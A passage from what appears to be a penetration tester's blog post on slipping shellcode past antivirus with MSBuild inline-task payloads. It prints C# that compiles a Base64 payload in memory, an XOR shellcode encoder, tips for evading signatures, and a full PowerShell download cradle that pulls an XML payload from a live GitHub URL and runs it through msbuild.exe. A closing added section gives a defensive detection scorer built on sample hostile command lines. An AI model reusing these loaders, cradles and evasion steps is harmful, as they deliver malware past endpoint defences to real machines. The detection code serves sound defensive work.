              CSharpCodeProvider nps = new CSharpCodeProvider();
              CompilerParameters parameters = new CompilerParameters();
              parameters.ReferencedAssemblies.Add("System.dll");
              parameters.ReferencedAssemblies.Add("System.Runtime.InteropServices.dll");
              parameters.GenerateExecutable = false;
              parameters.GenerateInMemory = true;
              parameters.IncludeDebugInformation = false;
              CompilerResults results = nps.CompileAssemblyFromSource(parameters, Base64Decode(cmd));
              Assembly assembly = results.CompiledAssembly;
              object obj = assembly.CreateInstance("ClassExample");
              obj.GetType().InvokeMember("Execute", BindingFlags.InvokeMethod, null, obj, null);
              return true;
          }
          public static string Base64Encode(string text) {
              return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));
          }
          public static string Base64Decode(string encodedtext) {
              return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));
          }
        }]]>
      </Code>    
    </Task>  
  </UsingTask>
</Project>


Decode the string as Base64 and then play around with the C# code. What I did to get it working was simply move the ‘using System.Text;’ directive to the first line, as shown below:

using System;
using System.Runtime.InteropServices;
using System.Text;

public class ClassExample
{
    private static UInt32 MEM_COMMIT = 0x1000;
    private static UInt32 PAGE_READWRITE = 0x04;
 
[…snipped…]


After modification:

using System.Text;
using System;
using System.Runtime.InteropServices;
 
public class ClassExample
{
    private static UInt32 MEM_COMMIT = 0x1000;
    private static UInt32 PAGE_READWRITE = 0x04;
 
[…snipped…]


It’s a lot easier to edit the nps_payload.py source code directly in the ‘encode_csharppayload’ function definition and then generate the C# payload with the tool, but this way might be more helpful to illustrate what the tool does and how it works.

Snippet below:

def encode_csharppayload(payload_file):
  global csharp_payload

  raw_file = open(payload_file, "rb")
  raw_b64 = base64.b64encode(raw_file.read())
  from itertools import cycle, izip
  import random, string
  key = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits + string.ascii_lowercase) for _ in range(20))
  cryptedMessage = ''.join(chr(ord(c)^ord(k)) for c,k in izip(raw_b64, cycle(key)))
  str_shellcode = base64.b64encode(cryptedMessage.encode('utf-8'))
  raw_file.close()

  # Create launcher class
  launcher = """
using System.Text;
using System;
using System.Runtime.InteropServices;

public class ClassExample
{
    private static UInt32 MEM_COMMIT = 0x1000;
    private static UInt32 PAGE_READWRITE = 0x04;
    private static UInt32 PAGE_EXECUTE_READ = 0x20;


By the time you’re reading this, it may no longer work. Some things you could try at this point would be to use the method mentioned previously, remove references to nps, change parameter names (cmd for example), play around with various using directives, hardcode your own 20 character ‘key’ value within the ‘encode_csharppayload’ function.


A note on delivery: Invoke-CradleCrafter

This section wouldn’t be complete without a little discussion on how to deliver the XML file to the target system. If you had access to a terminal it would be easiest to just copy or create a new file and run the following command:

%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe  <path_to_xml>


If you have command line access then a good tool to use at this point is Invoke-CradleCrafter. The tool is written by the same person that wrote Invoke-Obfuscation but focuses on generating various commands and techniques for the download aspect. The tool nicely differentiates between file-based methods and file-less methods. Of the three file-based methods, I found BITSAdmin, PsBits and PsWebFile worked well against our corporate AV and Defender. Run it as follows:

Import the module and execute the tool:

import-module .\Invoke-CradleCrafter.psd1
invoke-cradlecrafter


You can type help or tutorial to get a list of options or commands.

Type disk to get the following options:

Select your delivery method, here I selected PSWEBFILE followed by invoke but you can play around with other options:

I selected 2 for PS IEX:

This is very similar to the way Invoke-Obfuscation was written so you can type ‘show options’ to show what options you have (also ‘undo’ to undo the most recent changes). I set the POSTCRADLECOMMAND to the msbuild command so that you can execute it all in one go. I also uploaded the XML file to my GitHub account and set the URL to point to the raw file:

set url https://raw.githubusercontent.com/nnh100/uploads/master/payloads/nps_payload_mod.xml
set path c:\temp\tempbuild.xml
set postcradlecommand c:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe c:\windows\temp\tempbuild.xml


Type ‘show options’ and copy and paste the ObfuscatedCradle string into your command line:

(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/nnh100/uploads/master/payloads/nps_payload_mod.xml','c:\temp\tempbuild.xml');([String]::Join('',([Char[]](CONTENT c:\temp\tempbuild.xml -Enco 3))))|Invoke-Expression;c:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe c:\windows\temp\tempbuild.xml 
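On the detection side, the launcher strings in this post all leave a mark in process-creation telemetry: the Veil batch file’s -NoP -NonI -W Hidden command line, Unicorn’s s''v quote splitting, and the cradle above that downloads a project file and hands it straight to msbuild.exe. The following added example, which is not from the post or from any of the tools it covers, scores Sysmon-style records for those patterns. The six records, the indicator labels, the weights and the threshold are all constructed for this example rather than taken from a real sensor or rule set.

```python
"""Score process-creation telemetry for the launch patterns seen in this post.

Added example for defenders; not code from the post or any tool it covers.
Records are constructed in a Sysmon Event ID 1 shape (Image, ParentImage,
CommandLine) and are not real telemetry. Weights and labels are choices made
for this example, not a vendor rule set.
"""
import re
from os.path import basename

CMDLINE_INDICATORS = [
    # Hidden window (-W Hidden / /w 1) as in the Veil and Unicorn launchers.
    ("hidden_window", re.compile(r"[-/]w(?:indowstyle)?\s+(?:hidden|1)\b", re.I), 3),
    ("no_profile_or_noninteractive", re.compile(r"[-/]no(?:p|ni|profile|ninteractive)\b", re.I), 1),
    ("encoded_command", re.compile(r"[-/](?:encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    ("download_cradle", re.compile(r"net\.webclient|downloadfile|downloadstring|invoke-webrequest|bitsadmin", re.I), 2),
    ("in_memory_decode", re.compile(r"frombase64string|deflatestream|memorystream", re.I), 2),
    # Unicorn-style s''v / g''v splitting of cmdlet names with empty quotes.
    ("quote_splitting", re.compile(r"\w''\w"), 2),
    # Forcing the PowerShell v2 engine (the downgrade attack Unicorn describes).
    ("powershell_downgrade", re.compile(r"[-/]v(?:ersion)?\s+2\b", re.I), 2),
    # A non-msbuild process naming msbuild.exe, as the cradle above does.
    ("chained_msbuild", re.compile(r"msbuild\.exe", re.I), 3),
]
BUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe", "vbcscompiler.exe"}
THRESHOLD = 5


def _exe(path):
    """Lower-cased file name of a Windows path, tolerant of either slash."""
    return basename(path.replace("\\", "/")).lower()


def score_event(event):
    """Return (score, labels) for one process-creation record."""
    image, parent = _exe(event["Image"]), _exe(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    for label, pattern, weight in CMDLINE_INDICATORS:
        if label == "chained_msbuild" and image == "msbuild.exe":
            continue  # msbuild naming itself on its own command line is normal
        if pattern.search(cmd):
            hits.append((label, weight))
    if image == "msbuild.exe":
        # Inline-task abuse passes a bare .xml project, typically from a
        # user-writable path and a non-build parent such as cmd.exe.
        if re.search(r"\S+\.xml\b", cmd, re.I):
            hits.append(("msbuild_inline_xml_project", 4))
        if parent not in BUILD_PARENTS:
            hits.append(("msbuild_unusual_parent", 2))
    return sum(w for _, w in hits), [label for label, _ in hits]


def flagged_ids(events, threshold=THRESHOLD):
    """Ids of records whose score reaches the threshold."""
    return [e["Id"] for e in events if score_event(e)[0] >= threshold]


# Constructed records. <blob> stands in for an encoded payload; the URL is a
# placeholder. Records 2 and 4 are ordinary admin and build activity.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
CMD = r"C:\Windows\System32\cmd.exe"
EVENTS = [
    {"Id": 1, "Image": PS, "ParentImage": CMD,
     "CommandLine": r'powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("<blob>")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"'},
    {"Id": 2, "Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\rotate-logs.ps1"},
    {"Id": 3, "Image": PS, "ParentImage": CMD,
     "CommandLine": r"powershell (New-Object Net.WebClient).DownloadFile('https://files.example.invalid/build.xml','c:\temp\tempbuild.xml');([String]::Join('',([Char[]](CONTENT c:\temp\tempbuild.xml -Enco 3))))|Invoke-Expression;c:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe c:\temp\tempbuild.xml"},
    {"Id": 4, "Image": MSBUILD, "ParentImage": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
     "CommandLine": r"MSBuild.exe /nologo /p:Configuration=Release C:\src\app\app.csproj"},
    {"Id": 5, "Image": MSBUILD, "ParentImage": CMD,
     "CommandLine": r"msbuild.exe C:\Users\alice\AppData\Local\Temp\tempbuild.xml"},
    {"Id": 6, "Image": PS, "ParentImage": CMD,
     "CommandLine": r'''powershell /w 1 /C "s''v xVY -;s''v az e''c;s''v lK ((g''v xVY).value.toString()+(g''v az).value.toString());powershell (g''v lK).value.toString() ('<blob>')"'''},
]

if __name__ == "__main__":
    for event in EVENTS:
        print(event["Id"], score_event(event))
    print("flagged:", flagged_ids(EVENTS))
```

Note that the cradle is caught on its shape rather than on any particular payload: a download followed by Invoke-Expression and a hand-off to msbuild.exe scores above the threshold even with every string obfuscated, which is why the author saw the obfuscated launchers fail against Defender’s run-time checks while static scanners at VirusTotal stayed quiet. The scheduled rotate-logs.ps1 run and the Visual Studio build stay below the threshold, which is the point of weighting rather than matching single flags.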


I should probably stop here. Whilst being far too long, I hope it has been useful and was somewhat structured.

UPDATE: This blog post was originally written in February/March. Unicorn V.3.7.6 was retested with the above techniques but it was still not possible to get past Defender.